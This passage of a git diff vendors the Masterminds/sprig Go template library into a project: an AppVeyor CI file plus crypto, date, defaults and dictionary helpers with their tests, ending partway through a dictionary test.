diff --git a/vendor/github.com/Masterminds/sprig/appveyor.yml b/vendor/github.com/Masterminds/sprig/appveyor.yml new file mode 100644 index 0000000000..d545a987a3 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/appveyor.yml @@ -0,0 +1,26 @@ + +version: build-{build}.{branch} + +clone_folder: C:\gopath\src\github.com\Masterminds\sprig +shallow_clone: true + +environment: + GOPATH: C:\gopath + +platform: + - x64 + +install: + - go get -u github.com/Masterminds/glide + - set PATH=%GOPATH%\bin;%PATH% + - go version + - go env + +build_script: + - glide install + - go install ./... + +test_script: + - go test -v + +deploy: off diff --git a/vendor/github.com/Masterminds/sprig/crypto.go b/vendor/github.com/Masterminds/sprig/crypto.go new file mode 100644 index 0000000000..a91c4a7045 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/crypto.go @@ -0,0 +1,430 @@ +package sprig + +import ( + "bytes" + "crypto/dsa" + "crypto/ecdsa" + "crypto/elliptic" + "crypto/hmac" + "crypto/rand" + "crypto/rsa" + "crypto/sha1" + "crypto/sha256" + "crypto/x509" + "crypto/x509/pkix" + "encoding/asn1" + "encoding/base64" + "encoding/binary" + "encoding/hex" + "encoding/pem" + "errors" + "fmt" + "math/big" + "net" + "time" + + "github.com/google/uuid" + "golang.org/x/crypto/scrypt" +) + +func sha256sum(input string) string { + hash := sha256.Sum256([]byte(input)) + return hex.EncodeToString(hash[:]) +} + +func sha1sum(input string) string { + hash := sha1.Sum([]byte(input)) + return hex.EncodeToString(hash[:]) +} + +// uuidv4 provides a safe and secure UUID v4 implementation +func uuidv4() string { + return fmt.Sprintf("%s", uuid.New()) +} + +var master_password_seed = "com.lyndir.masterpassword" + +var password_type_templates = map[string][][]byte{ + "maximum": {[]byte("anoxxxxxxxxxxxxxxxxx"), []byte("axxxxxxxxxxxxxxxxxno")}, + "long": {[]byte("CvcvnoCvcvCvcv"), []byte("CvcvCvcvnoCvcv"), []byte("CvcvCvcvCvcvno"), []byte("CvccnoCvcvCvcv"), []byte("CvccCvcvnoCvcv"), + 
[]byte("CvccCvcvCvcvno"), []byte("CvcvnoCvccCvcv"), []byte("CvcvCvccnoCvcv"), []byte("CvcvCvccCvcvno"), []byte("CvcvnoCvcvCvcc"), + []byte("CvcvCvcvnoCvcc"), []byte("CvcvCvcvCvccno"), []byte("CvccnoCvccCvcv"), []byte("CvccCvccnoCvcv"), []byte("CvccCvccCvcvno"), + []byte("CvcvnoCvccCvcc"), []byte("CvcvCvccnoCvcc"), []byte("CvcvCvccCvccno"), []byte("CvccnoCvcvCvcc"), []byte("CvccCvcvnoCvcc"), + []byte("CvccCvcvCvccno")}, + "medium": {[]byte("CvcnoCvc"), []byte("CvcCvcno")}, + "short": {[]byte("Cvcn")}, + "basic": {[]byte("aaanaaan"), []byte("aannaaan"), []byte("aaannaaa")}, + "pin": {[]byte("nnnn")}, +} + +var template_characters = map[byte]string{ + 'V': "AEIOU", + 'C': "BCDFGHJKLMNPQRSTVWXYZ", + 'v': "aeiou", + 'c': "bcdfghjklmnpqrstvwxyz", + 'A': "AEIOUBCDFGHJKLMNPQRSTVWXYZ", + 'a': "AEIOUaeiouBCDFGHJKLMNPQRSTVWXYZbcdfghjklmnpqrstvwxyz", + 'n': "0123456789", + 'o': "@&%?,=[]_:-+*$#!'^~;()/.", + 'x': "AEIOUaeiouBCDFGHJKLMNPQRSTVWXYZbcdfghjklmnpqrstvwxyz0123456789!@#$%^&*()", +} + +func derivePassword(counter uint32, password_type, password, user, site string) string { + var templates = password_type_templates[password_type] + if templates == nil { + return fmt.Sprintf("cannot find password template %s", password_type) + } + + var buffer bytes.Buffer + buffer.WriteString(master_password_seed) + binary.Write(&buffer, binary.BigEndian, uint32(len(user))) + buffer.WriteString(user) + + salt := buffer.Bytes() + key, err := scrypt.Key([]byte(password), salt, 32768, 8, 2, 64) + if err != nil { + return fmt.Sprintf("failed to derive password: %s", err) + } + + buffer.Truncate(len(master_password_seed)) + binary.Write(&buffer, binary.BigEndian, uint32(len(site))) + buffer.WriteString(site) + binary.Write(&buffer, binary.BigEndian, counter) + + var hmacv = hmac.New(sha256.New, key) + hmacv.Write(buffer.Bytes()) + var seed = hmacv.Sum(nil) + var temp = templates[int(seed[0])%len(templates)] + + buffer.Truncate(0) + for i, element := range temp { + pass_chars := 
template_characters[element] + pass_char := pass_chars[int(seed[i+1])%len(pass_chars)] + buffer.WriteByte(pass_char) + } + + return buffer.String() +} + +func generatePrivateKey(typ string) string { + var priv interface{} + var err error + switch typ { + case "", "rsa": + // good enough for government work + priv, err = rsa.GenerateKey(rand.Reader, 4096) + case "dsa": + key := new(dsa.PrivateKey) + // again, good enough for government work + if err = dsa.GenerateParameters(&key.Parameters, rand.Reader, dsa.L2048N256); err != nil { + return fmt.Sprintf("failed to generate dsa params: %s", err) + } + err = dsa.GenerateKey(key, rand.Reader) + priv = key + case "ecdsa": + // again, good enough for government work + priv, err = ecdsa.GenerateKey(elliptic.P256(), rand.Reader) + default: + return "Unknown type " + typ + } + if err != nil { + return fmt.Sprintf("failed to generate private key: %s", err) + } + + return string(pem.EncodeToMemory(pemBlockForKey(priv))) +} + +type DSAKeyFormat struct { + Version int + P, Q, G, Y, X *big.Int +} + +func pemBlockForKey(priv interface{}) *pem.Block { + switch k := priv.(type) { + case *rsa.PrivateKey: + return &pem.Block{Type: "RSA PRIVATE KEY", Bytes: x509.MarshalPKCS1PrivateKey(k)} + case *dsa.PrivateKey: + val := DSAKeyFormat{ + P: k.P, Q: k.Q, G: k.G, + Y: k.Y, X: k.X, + } + bytes, _ := asn1.Marshal(val) + return &pem.Block{Type: "DSA PRIVATE KEY", Bytes: bytes} + case *ecdsa.PrivateKey: + b, _ := x509.MarshalECPrivateKey(k) + return &pem.Block{Type: "EC PRIVATE KEY", Bytes: b} + default: + return nil + } +} + +type certificate struct { + Cert string + Key string +} + +func buildCustomCertificate(b64cert string, b64key string) (certificate, error) { + crt := certificate{} + + cert, err := base64.StdEncoding.DecodeString(b64cert) + if err != nil { + return crt, errors.New("unable to decode base64 certificate") + } + + key, err := base64.StdEncoding.DecodeString(b64key) + if err != nil { + return crt, errors.New("unable to 
decode base64 private key") + } + + decodedCert, _ := pem.Decode(cert) + if decodedCert == nil { + return crt, errors.New("unable to decode certificate") + } + _, err = x509.ParseCertificate(decodedCert.Bytes) + if err != nil { + return crt, fmt.Errorf( + "error parsing certificate: decodedCert.Bytes: %s", + err, + ) + } + + decodedKey, _ := pem.Decode(key) + if decodedKey == nil { + return crt, errors.New("unable to decode key") + } + _, err = x509.ParsePKCS1PrivateKey(decodedKey.Bytes) + if err != nil { + return crt, fmt.Errorf( + "error parsing prive key: decodedKey.Bytes: %s", + err, + ) + } + + crt.Cert = string(cert) + crt.Key = string(key) + + return crt, nil +} + +func generateCertificateAuthority( + cn string, + daysValid int, +) (certificate, error) { + ca := certificate{} + + template, err := getBaseCertTemplate(cn, nil, nil, daysValid) + if err != nil { + return ca, err + } + // Override KeyUsage and IsCA + template.KeyUsage = x509.KeyUsageKeyEncipherment | + x509.KeyUsageDigitalSignature | + x509.KeyUsageCertSign + template.IsCA = true + + priv, err := rsa.GenerateKey(rand.Reader, 2048) + if err != nil { + return ca, fmt.Errorf("error generating rsa key: %s", err) + } + + ca.Cert, ca.Key, err = getCertAndKey(template, priv, template, priv) + if err != nil { + return ca, err + } + + return ca, nil +} + +func generateSelfSignedCertificate( + cn string, + ips []interface{}, + alternateDNS []interface{}, + daysValid int, +) (certificate, error) { + cert := certificate{} + + template, err := getBaseCertTemplate(cn, ips, alternateDNS, daysValid) + if err != nil { + return cert, err + } + + priv, err := rsa.GenerateKey(rand.Reader, 2048) + if err != nil { + return cert, fmt.Errorf("error generating rsa key: %s", err) + } + + cert.Cert, cert.Key, err = getCertAndKey(template, priv, template, priv) + if err != nil { + return cert, err + } + + return cert, nil +} + +func generateSignedCertificate( + cn string, + ips []interface{}, + alternateDNS []interface{}, + 
daysValid int, + ca certificate, +) (certificate, error) { + cert := certificate{} + + decodedSignerCert, _ := pem.Decode([]byte(ca.Cert)) + if decodedSignerCert == nil { + return cert, errors.New("unable to decode certificate") + } + signerCert, err := x509.ParseCertificate(decodedSignerCert.Bytes) + if err != nil { + return cert, fmt.Errorf( + "error parsing certificate: decodedSignerCert.Bytes: %s", + err, + ) + } + decodedSignerKey, _ := pem.Decode([]byte(ca.Key)) + if decodedSignerKey == nil { + return cert, errors.New("unable to decode key") + } + signerKey, err := x509.ParsePKCS1PrivateKey(decodedSignerKey.Bytes) + if err != nil { + return cert, fmt.Errorf( + "error parsing prive key: decodedSignerKey.Bytes: %s", + err, + ) + } + + template, err := getBaseCertTemplate(cn, ips, alternateDNS, daysValid) + if err != nil { + return cert, err + } + + priv, err := rsa.GenerateKey(rand.Reader, 2048) + if err != nil { + return cert, fmt.Errorf("error generating rsa key: %s", err) + } + + cert.Cert, cert.Key, err = getCertAndKey( + template, + priv, + signerCert, + signerKey, + ) + if err != nil { + return cert, err + } + + return cert, nil +} + +func getCertAndKey( + template *x509.Certificate, + signeeKey *rsa.PrivateKey, + parent *x509.Certificate, + signingKey *rsa.PrivateKey, +) (string, string, error) { + derBytes, err := x509.CreateCertificate( + rand.Reader, + template, + parent, + &signeeKey.PublicKey, + signingKey, + ) + if err != nil { + return "", "", fmt.Errorf("error creating certificate: %s", err) + } + + certBuffer := bytes.Buffer{} + if err := pem.Encode( + &certBuffer, + &pem.Block{Type: "CERTIFICATE", Bytes: derBytes}, + ); err != nil { + return "", "", fmt.Errorf("error pem-encoding certificate: %s", err) + } + + keyBuffer := bytes.Buffer{} + if err := pem.Encode( + &keyBuffer, + &pem.Block{ + Type: "RSA PRIVATE KEY", + Bytes: x509.MarshalPKCS1PrivateKey(signeeKey), + }, + ); err != nil { + return "", "", fmt.Errorf("error pem-encoding key: %s", 
err) + } + + return string(certBuffer.Bytes()), string(keyBuffer.Bytes()), nil +} + +func getBaseCertTemplate( + cn string, + ips []interface{}, + alternateDNS []interface{}, + daysValid int, +) (*x509.Certificate, error) { + ipAddresses, err := getNetIPs(ips) + if err != nil { + return nil, err + } + dnsNames, err := getAlternateDNSStrs(alternateDNS) + if err != nil { + return nil, err + } + return &x509.Certificate{ + SerialNumber: big.NewInt(1), + Subject: pkix.Name{ + CommonName: cn, + }, + IPAddresses: ipAddresses, + DNSNames: dnsNames, + NotBefore: time.Now(), + NotAfter: time.Now().Add(time.Hour * 24 * time.Duration(daysValid)), + KeyUsage: x509.KeyUsageKeyEncipherment | x509.KeyUsageDigitalSignature, + ExtKeyUsage: []x509.ExtKeyUsage{ + x509.ExtKeyUsageServerAuth, + x509.ExtKeyUsageClientAuth, + }, + BasicConstraintsValid: true, + }, nil +} + +func getNetIPs(ips []interface{}) ([]net.IP, error) { + if ips == nil { + return []net.IP{}, nil + } + var ipStr string + var ok bool + var netIP net.IP + netIPs := make([]net.IP, len(ips)) + for i, ip := range ips { + ipStr, ok = ip.(string) + if !ok { + return nil, fmt.Errorf("error parsing ip: %v is not a string", ip) + } + netIP = net.ParseIP(ipStr) + if netIP == nil { + return nil, fmt.Errorf("error parsing ip: %s", ipStr) + } + netIPs[i] = netIP + } + return netIPs, nil +} + +func getAlternateDNSStrs(alternateDNS []interface{}) ([]string, error) { + if alternateDNS == nil { + return []string{}, nil + } + var dnsStr string + var ok bool + alternateDNSStrs := make([]string, len(alternateDNS)) + for i, dns := range alternateDNS { + dnsStr, ok = dns.(string) + if !ok { + return nil, fmt.Errorf( + "error processing alternate dns name: %v is not a string", + dns, + ) + } + alternateDNSStrs[i] = dnsStr + } + return alternateDNSStrs, nil +} diff --git a/vendor/github.com/Masterminds/sprig/crypto_test.go b/vendor/github.com/Masterminds/sprig/crypto_test.go new file mode 100644 index 0000000000..77b3e3fb2c --- /dev/null 
+++ b/vendor/github.com/Masterminds/sprig/crypto_test.go @@ -0,0 +1,259 @@ +package sprig + +import ( + "crypto/x509" + "encoding/base64" + "encoding/pem" + "fmt" + "strings" + "testing" + + "github.com/stretchr/testify/assert" +) + +const ( + beginCertificate = "-----BEGIN CERTIFICATE-----" + endCertificate = "-----END CERTIFICATE-----" +) + +func TestSha256Sum(t *testing.T) { + tpl := `{{"abc" | sha256sum}}` + if err := runt(tpl, "ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad"); err != nil { + t.Error(err) + } +} +func TestSha1Sum(t *testing.T) { + tpl := `{{"abc" | sha1sum}}` + if err := runt(tpl, "a9993e364706816aba3e25717850c26c9cd0d89d"); err != nil { + t.Error(err) + } +} + +func TestDerivePassword(t *testing.T) { + expectations := map[string]string{ + `{{derivePassword 1 "long" "password" "user" "example.com"}}`: "ZedaFaxcZaso9*", + `{{derivePassword 2 "long" "password" "user" "example.com"}}`: "Fovi2@JifpTupx", + `{{derivePassword 1 "maximum" "password" "user" "example.com"}}`: "pf4zS1LjCg&LjhsZ7T2~", + `{{derivePassword 1 "medium" "password" "user" "example.com"}}`: "ZedJuz8$", + `{{derivePassword 1 "basic" "password" "user" "example.com"}}`: "pIS54PLs", + `{{derivePassword 1 "short" "password" "user" "example.com"}}`: "Zed5", + `{{derivePassword 1 "pin" "password" "user" "example.com"}}`: "6685", + } + + for tpl, result := range expectations { + out, err := runRaw(tpl, nil) + if err != nil { + t.Error(err) + } + if 0 != strings.Compare(out, result) { + t.Error("Generated password does not match for", tpl) + } + } +} + +// NOTE(bacongobbler): this test is really _slow_ because of how long it takes to compute +// and generate a new crypto key. 
+func TestGenPrivateKey(t *testing.T) { + // test that calling by default generates an RSA private key + tpl := `{{genPrivateKey ""}}` + out, err := runRaw(tpl, nil) + if err != nil { + t.Error(err) + } + if !strings.Contains(out, "RSA PRIVATE KEY") { + t.Error("Expected RSA PRIVATE KEY") + } + // test all acceptable arguments + tpl = `{{genPrivateKey "rsa"}}` + out, err = runRaw(tpl, nil) + if err != nil { + t.Error(err) + } + if !strings.Contains(out, "RSA PRIVATE KEY") { + t.Error("Expected RSA PRIVATE KEY") + } + tpl = `{{genPrivateKey "dsa"}}` + out, err = runRaw(tpl, nil) + if err != nil { + t.Error(err) + } + if !strings.Contains(out, "DSA PRIVATE KEY") { + t.Error("Expected DSA PRIVATE KEY") + } + tpl = `{{genPrivateKey "ecdsa"}}` + out, err = runRaw(tpl, nil) + if err != nil { + t.Error(err) + } + if !strings.Contains(out, "EC PRIVATE KEY") { + t.Error("Expected EC PRIVATE KEY") + } + // test bad + tpl = `{{genPrivateKey "bad"}}` + out, err = runRaw(tpl, nil) + if err != nil { + t.Error(err) + } + if out != "Unknown type bad" { + t.Error("Expected type 'bad' to be an unknown crypto algorithm") + } + // ensure that we can base64 encode the string + tpl = `{{genPrivateKey "rsa" | b64enc}}` + out, err = runRaw(tpl, nil) + if err != nil { + t.Error(err) + } +} + +func TestUUIDGeneration(t *testing.T) { + tpl := `{{uuidv4}}` + out, err := runRaw(tpl, nil) + if err != nil { + t.Error(err) + } + + if len(out) != 36 { + t.Error("Expected UUID of length 36") + } + + out2, err := runRaw(tpl, nil) + if err != nil { + t.Error(err) + } + + if out == out2 { + t.Error("Expected subsequent UUID generations to be different") + } +} + +func TestBuildCustomCert(t *testing.T) { + ca, _ := generateCertificateAuthority("example.com", 365) + tpl := fmt.Sprintf( + `{{- $ca := buildCustomCert "%s" "%s"}} +{{- $ca.Cert }}`, + base64.StdEncoding.EncodeToString([]byte(ca.Cert)), + base64.StdEncoding.EncodeToString([]byte(ca.Key)), + ) + out, err := runRaw(tpl, nil) + if err != nil { 
+ t.Error(err) + } + + tpl2 := fmt.Sprintf( + `{{- $ca := buildCustomCert "%s" "%s"}} +{{- $ca.Cert }}`, + base64.StdEncoding.EncodeToString([]byte("fail")), + base64.StdEncoding.EncodeToString([]byte(ca.Key)), + ) + out2, _ := runRaw(tpl2, nil) + + assert.Equal(t, out, ca.Cert) + assert.NotEqual(t, out2, ca.Cert) +} + +func TestGenCA(t *testing.T) { + const cn = "foo-ca" + + tpl := fmt.Sprintf( + `{{- $ca := genCA "%s" 365 }} +{{ $ca.Cert }} +`, + cn, + ) + out, err := runRaw(tpl, nil) + if err != nil { + t.Error(err) + } + assert.Contains(t, out, beginCertificate) + assert.Contains(t, out, endCertificate) + + decodedCert, _ := pem.Decode([]byte(out)) + assert.Nil(t, err) + cert, err := x509.ParseCertificate(decodedCert.Bytes) + assert.Nil(t, err) + + assert.Equal(t, cn, cert.Subject.CommonName) + assert.True(t, cert.IsCA) +} + +func TestGenSelfSignedCert(t *testing.T) { + const ( + cn = "foo.com" + ip1 = "10.0.0.1" + ip2 = "10.0.0.2" + dns1 = "bar.com" + dns2 = "bat.com" + ) + + tpl := fmt.Sprintf( + `{{- $cert := genSelfSignedCert "%s" (list "%s" "%s") (list "%s" "%s") 365 }} +{{ $cert.Cert }}`, + cn, + ip1, + ip2, + dns1, + dns2, + ) + + out, err := runRaw(tpl, nil) + if err != nil { + t.Error(err) + } + assert.Contains(t, out, beginCertificate) + assert.Contains(t, out, endCertificate) + + decodedCert, _ := pem.Decode([]byte(out)) + assert.Nil(t, err) + cert, err := x509.ParseCertificate(decodedCert.Bytes) + assert.Nil(t, err) + + assert.Equal(t, cn, cert.Subject.CommonName) + assert.Equal(t, 2, len(cert.IPAddresses)) + assert.Equal(t, ip1, cert.IPAddresses[0].String()) + assert.Equal(t, ip2, cert.IPAddresses[1].String()) + assert.Contains(t, cert.DNSNames, dns1) + assert.Contains(t, cert.DNSNames, dns2) + assert.False(t, cert.IsCA) +} + +func TestGenSignedCert(t *testing.T) { + const ( + cn = "foo.com" + ip1 = "10.0.0.1" + ip2 = "10.0.0.2" + dns1 = "bar.com" + dns2 = "bat.com" + ) + + tpl := fmt.Sprintf( + `{{- $ca := genCA "foo" 365 }} +{{- $cert := 
genSignedCert "%s" (list "%s" "%s") (list "%s" "%s") 365 $ca }} +{{ $cert.Cert }} +`, + cn, + ip1, + ip2, + dns1, + dns2, + ) + out, err := runRaw(tpl, nil) + if err != nil { + t.Error(err) + } + + assert.Contains(t, out, beginCertificate) + assert.Contains(t, out, endCertificate) + + decodedCert, _ := pem.Decode([]byte(out)) + assert.Nil(t, err) + cert, err := x509.ParseCertificate(decodedCert.Bytes) + assert.Nil(t, err) + + assert.Equal(t, cn, cert.Subject.CommonName) + assert.Equal(t, 2, len(cert.IPAddresses)) + assert.Equal(t, ip1, cert.IPAddresses[0].String()) + assert.Equal(t, ip2, cert.IPAddresses[1].String()) + assert.Contains(t, cert.DNSNames, dns1) + assert.Contains(t, cert.DNSNames, dns2) + assert.False(t, cert.IsCA) +} diff --git a/vendor/github.com/Masterminds/sprig/date.go b/vendor/github.com/Masterminds/sprig/date.go new file mode 100644 index 0000000000..1c2c3653c8 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/date.go @@ -0,0 +1,76 @@ +package sprig + +import ( + "time" +) + +// Given a format and a date, format the date string. +// +// Date can be a `time.Time` or an `int, int32, int64`. +// In the later case, it is treated as seconds since UNIX +// epoch. 
+func date(fmt string, date interface{}) string { + return dateInZone(fmt, date, "Local") +} + +func htmlDate(date interface{}) string { + return dateInZone("2006-01-02", date, "Local") +} + +func htmlDateInZone(date interface{}, zone string) string { + return dateInZone("2006-01-02", date, zone) +} + +func dateInZone(fmt string, date interface{}, zone string) string { + var t time.Time + switch date := date.(type) { + default: + t = time.Now() + case time.Time: + t = date + case int64: + t = time.Unix(date, 0) + case int: + t = time.Unix(int64(date), 0) + case int32: + t = time.Unix(int64(date), 0) + } + + loc, err := time.LoadLocation(zone) + if err != nil { + loc, _ = time.LoadLocation("UTC") + } + + return t.In(loc).Format(fmt) +} + +func dateModify(fmt string, date time.Time) time.Time { + d, err := time.ParseDuration(fmt) + if err != nil { + return date + } + return date.Add(d) +} + +func dateAgo(date interface{}) string { + var t time.Time + + switch date := date.(type) { + default: + t = time.Now() + case time.Time: + t = date + case int64: + t = time.Unix(date, 0) + case int: + t = time.Unix(int64(date), 0) + } + // Drop resolution to seconds + duration := time.Since(t).Round(time.Second) + return duration.String() +} + +func toDate(fmt, str string) time.Time { + t, _ := time.ParseInLocation(fmt, str, time.Local) + return t +} diff --git a/vendor/github.com/Masterminds/sprig/date_test.go b/vendor/github.com/Masterminds/sprig/date_test.go new file mode 100644 index 0000000000..b98200dd03 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/date_test.go @@ -0,0 +1,36 @@ +package sprig + +import ( + "testing" + "time" +) + +func TestHtmlDate(t *testing.T) { + t.Skip() + tpl := `{{ htmlDate 0}}` + if err := runt(tpl, "1970-01-01"); err != nil { + t.Error(err) + } +} + +func TestAgo(t *testing.T) { + tpl := "{{ ago .Time }}" + if err := runtv(tpl, "2m5s", map[string]interface{}{"Time": time.Now().Add(-125 * time.Second)}); err != nil { + t.Error(err) + } + + 
if err := runtv(tpl, "2h34m17s", map[string]interface{}{"Time": time.Now().Add(-(2*3600 + 34*60 + 17) * time.Second)}); err != nil { + t.Error(err) + } + + if err := runtv(tpl, "-5s", map[string]interface{}{"Time": time.Now().Add(5 * time.Second)}); err != nil { + t.Error(err) + } +} + +func TestToDate(t *testing.T) { + tpl := `{{toDate "2006-01-02" "2017-12-31" | date "02/01/2006"}}` + if err := runt(tpl, "31/12/2017"); err != nil { + t.Error(err) + } +} diff --git a/vendor/github.com/Masterminds/sprig/defaults.go b/vendor/github.com/Masterminds/sprig/defaults.go new file mode 100644 index 0000000000..f0161317dc --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/defaults.go @@ -0,0 +1,84 @@ +package sprig + +import ( + "encoding/json" + "reflect" +) + +// dfault checks whether `given` is set, and returns default if not set. +// +// This returns `d` if `given` appears not to be set, and `given` otherwise. +// +// For numeric types 0 is unset. +// For strings, maps, arrays, and slices, len() = 0 is considered unset. +// For bool, false is unset. +// Structs are never considered unset. +// +// For everything else, including pointers, a nil value is unset. +func dfault(d interface{}, given ...interface{}) interface{} { + + if empty(given) || empty(given[0]) { + return d + } + return given[0] +} + +// empty returns true if the given value has the zero value for its type. 
+func empty(given interface{}) bool { + g := reflect.ValueOf(given) + if !g.IsValid() { + return true + } + + // Basically adapted from text/template.isTrue + switch g.Kind() { + default: + return g.IsNil() + case reflect.Array, reflect.Slice, reflect.Map, reflect.String: + return g.Len() == 0 + case reflect.Bool: + return g.Bool() == false + case reflect.Complex64, reflect.Complex128: + return g.Complex() == 0 + case reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64: + return g.Int() == 0 + case reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uintptr: + return g.Uint() == 0 + case reflect.Float32, reflect.Float64: + return g.Float() == 0 + case reflect.Struct: + return false + } + return true +} + +// coalesce returns the first non-empty value. +func coalesce(v ...interface{}) interface{} { + for _, val := range v { + if !empty(val) { + return val + } + } + return nil +} + +// toJson encodes an item into a JSON string +func toJson(v interface{}) string { + output, _ := json.Marshal(v) + return string(output) +} + +// toPrettyJson encodes an item into a pretty (indented) JSON string +func toPrettyJson(v interface{}) string { + output, _ := json.MarshalIndent(v, "", " ") + return string(output) +} + +// ternary returns the first value if the last value is true, otherwise returns the second value. 
+func ternary(vt interface{}, vf interface{}, v bool) interface{} { + if v { + return vt + } + + return vf +} diff --git a/vendor/github.com/Masterminds/sprig/defaults_test.go b/vendor/github.com/Masterminds/sprig/defaults_test.go new file mode 100644 index 0000000000..226d914cbf --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/defaults_test.go @@ -0,0 +1,129 @@ +package sprig + +import ( + "testing" + + "github.com/stretchr/testify/assert" +) + +func TestDefault(t *testing.T) { + tpl := `{{"" | default "foo"}}` + if err := runt(tpl, "foo"); err != nil { + t.Error(err) + } + tpl = `{{default "foo" 234}}` + if err := runt(tpl, "234"); err != nil { + t.Error(err) + } + tpl = `{{default "foo" 2.34}}` + if err := runt(tpl, "2.34"); err != nil { + t.Error(err) + } + + tpl = `{{ .Nothing | default "123" }}` + if err := runt(tpl, "123"); err != nil { + t.Error(err) + } + tpl = `{{ default "123" }}` + if err := runt(tpl, "123"); err != nil { + t.Error(err) + } +} + +func TestEmpty(t *testing.T) { + tpl := `{{if empty 1}}1{{else}}0{{end}}` + if err := runt(tpl, "0"); err != nil { + t.Error(err) + } + + tpl = `{{if empty 0}}1{{else}}0{{end}}` + if err := runt(tpl, "1"); err != nil { + t.Error(err) + } + tpl = `{{if empty ""}}1{{else}}0{{end}}` + if err := runt(tpl, "1"); err != nil { + t.Error(err) + } + tpl = `{{if empty 0.0}}1{{else}}0{{end}}` + if err := runt(tpl, "1"); err != nil { + t.Error(err) + } + tpl = `{{if empty false}}1{{else}}0{{end}}` + if err := runt(tpl, "1"); err != nil { + t.Error(err) + } + + dict := map[string]interface{}{"top": map[string]interface{}{}} + tpl = `{{if empty .top.NoSuchThing}}1{{else}}0{{end}}` + if err := runtv(tpl, "1", dict); err != nil { + t.Error(err) + } + tpl = `{{if empty .bottom.NoSuchThing}}1{{else}}0{{end}}` + if err := runtv(tpl, "1", dict); err != nil { + t.Error(err) + } +} +func TestCoalesce(t *testing.T) { + tests := map[string]string{ + `{{ coalesce 1 }}`: "1", + `{{ coalesce "" 0 nil 2 }}`: "2", + `{{ $two := 2 
}}{{ coalesce "" 0 nil $two }}`: "2", + `{{ $two := 2 }}{{ coalesce "" $two 0 0 0 }}`: "2", + `{{ $two := 2 }}{{ coalesce "" $two 3 4 5 }}`: "2", + `{{ coalesce }}`: "", + } + for tpl, expect := range tests { + assert.NoError(t, runt(tpl, expect)) + } + + dict := map[string]interface{}{"top": map[string]interface{}{}} + tpl := `{{ coalesce .top.NoSuchThing .bottom .bottom.dollar "airplane"}}` + if err := runtv(tpl, "airplane", dict); err != nil { + t.Error(err) + } +} + +func TestToJson(t *testing.T) { + dict := map[string]interface{}{"Top": map[string]interface{}{"bool": true, "string": "test", "number": 42}} + + tpl := `{{.Top | toJson}}` + expected := `{"bool":true,"number":42,"string":"test"}` + if err := runtv(tpl, expected, dict); err != nil { + t.Error(err) + } +} + +func TestToPrettyJson(t *testing.T) { + dict := map[string]interface{}{"Top": map[string]interface{}{"bool": true, "string": "test", "number": 42}} + tpl := `{{.Top | toPrettyJson}}` + expected := `{ + "bool": true, + "number": 42, + "string": "test" +}` + if err := runtv(tpl, expected, dict); err != nil { + t.Error(err) + } +} + +func TestTernary(t *testing.T) { + tpl := `{{true | ternary "foo" "bar"}}` + if err := runt(tpl, "foo"); err != nil { + t.Error(err) + } + + tpl = `{{ternary "foo" "bar" true}}` + if err := runt(tpl, "foo"); err != nil { + t.Error(err) + } + + tpl = `{{false | ternary "foo" "bar"}}` + if err := runt(tpl, "bar"); err != nil { + t.Error(err) + } + + tpl = `{{ternary "foo" "bar" false}}` + if err := runt(tpl, "bar"); err != nil { + t.Error(err) + } +} diff --git a/vendor/github.com/Masterminds/sprig/dict.go b/vendor/github.com/Masterminds/sprig/dict.go new file mode 100644 index 0000000000..59076c0182 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/dict.go @@ -0,0 +1,88 @@ +package sprig + +import "github.com/imdario/mergo" + +func set(d map[string]interface{}, key string, value interface{}) map[string]interface{} { + d[key] = value + return d +} + +func unset(d 
map[string]interface{}, key string) map[string]interface{} { + delete(d, key) + return d +} + +func hasKey(d map[string]interface{}, key string) bool { + _, ok := d[key] + return ok +} + +func pluck(key string, d ...map[string]interface{}) []interface{} { + res := []interface{}{} + for _, dict := range d { + if val, ok := dict[key]; ok { + res = append(res, val) + } + } + return res +} + +func keys(dicts ...map[string]interface{}) []string { + k := []string{} + for _, dict := range dicts { + for key := range dict { + k = append(k, key) + } + } + return k +} + +func pick(dict map[string]interface{}, keys ...string) map[string]interface{} { + res := map[string]interface{}{} + for _, k := range keys { + if v, ok := dict[k]; ok { + res[k] = v + } + } + return res +} + +func omit(dict map[string]interface{}, keys ...string) map[string]interface{} { + res := map[string]interface{}{} + + omit := make(map[string]bool, len(keys)) + for _, k := range keys { + omit[k] = true + } + + for k, v := range dict { + if _, ok := omit[k]; !ok { + res[k] = v + } + } + return res +} + +func dict(v ...interface{}) map[string]interface{} { + dict := map[string]interface{}{} + lenv := len(v) + for i := 0; i < lenv; i += 2 { + key := strval(v[i]) + if i+1 >= lenv { + dict[key] = "" + continue + } + dict[key] = v[i+1] + } + return dict +} + +func merge(dst map[string]interface{}, srcs ...map[string]interface{}) interface{} { + for _, src := range srcs { + if err := mergo.Merge(&dst, src); err != nil { + // Swallow errors inside of a template. 
+ return "" + } + } + return dst +} diff --git a/vendor/github.com/Masterminds/sprig/dict_test.go b/vendor/github.com/Masterminds/sprig/dict_test.go new file mode 100644 index 0000000000..4ceb40a3db --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/dict_test.go @@ -0,0 +1,175 @@ +package sprig + +import ( + "strings" + "testing" + + "github.com/stretchr/testify/assert" +) + +func TestDict(t *testing.T) { + tpl := `{{$d := dict 1 2 "three" "four" 5}}{{range $k, $v := $d}}{{$k}}{{$v}}{{end}}` + out, err := runRaw(tpl, nil) + if err != nil { + t.Error(err) + } + if len(out) != 12 { + t.Errorf("Expected length 12, got %d", len(out)) + } + // dict does not guarantee ordering because it is backed by a map. + if !strings.Contains(out, "12") { + t.Error("Expected grouping 12") + } + if !strings.Contains(out, "threefour") { + t.Error("Expected grouping threefour") + } + if !strings.Contains(out, "5") { + t.Error("Expected 5") + } + tpl = `{{$t := dict "I" "shot" "the" "albatross"}}{{$t.the}} {{$t.I}}` + if err := runt(tpl, "albatross shot"); err != nil { + t.Error(err) + } +} + +func TestUnset(t *testing.T) { + tpl := `{{- $d := dict "one" 1 "two" 222222 -}} + {{- $_ := unset $d "two" -}} + {{- range $k, $v := 